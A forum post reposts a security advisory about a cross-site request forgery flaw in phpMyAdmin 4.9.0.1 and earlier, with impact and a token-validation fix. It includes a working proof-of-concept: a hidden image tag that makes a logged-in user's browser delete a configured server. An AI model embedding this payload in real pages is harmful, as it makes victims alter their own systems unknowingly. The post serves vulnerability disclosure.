Active Member Koray 2014 Posted September 13, 2019 Active Member Share Posted September 13, 2019 phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any server in the Setup page. PROOF OF CONCEPT ------------------------- Exploit CSRF - Deleting main server <p>Deleting Server 1</p> <img src=" http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" /> BUSINESS IMPACT ------------------------- The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method. SYSTEMS AFFECTED ------------------------- phpMyAdmin <= 4.9.0.1 SOLUTION ------------------------- Implement in each call the validation of the token variable, as already done in other phpMyAdmin requests. Source: https://www.exploit-db.com/exploits/47385 1 Link to comment Share on other sites More sharing options...
Recommended Posts
Please sign in to comment
You will be able to leave a comment after signing in
Sign In Now